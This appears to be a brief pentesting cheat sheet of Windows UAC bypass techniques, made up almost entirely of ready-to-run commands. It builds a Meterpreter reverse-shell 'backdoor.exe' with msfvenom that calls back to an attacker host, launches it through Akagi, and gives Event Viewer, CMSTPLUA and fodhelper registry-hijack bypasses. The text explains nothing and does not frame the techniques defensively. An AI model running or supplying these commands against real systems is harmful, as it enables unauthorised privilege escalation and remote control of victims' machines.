UAC Bypass Techniques

UACME (Akagi)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.5.2 LPORT=1234 -f exe > backdoor.exe
.\Akagi64.exe 23 C:\Temp\backdoor.exe

Event Viewer UAC bypass

Import-Module .\Invoke-EventViewer.ps1
Invoke-EventViewer cmd.exe

Reference: https://github.com/CsEnox/EventViewer-UACBypass

CMSTPLUA UAC Bypass

UACBypassCMSTPLUA.x86.exe cmd /k whoami

fodhelper.exe registry bypass

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<encoded-payload>" /f
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
fodhelper.exe

Verify the value:

REG query HKCU\Software\Classes\ms-settings\Shell\Open\command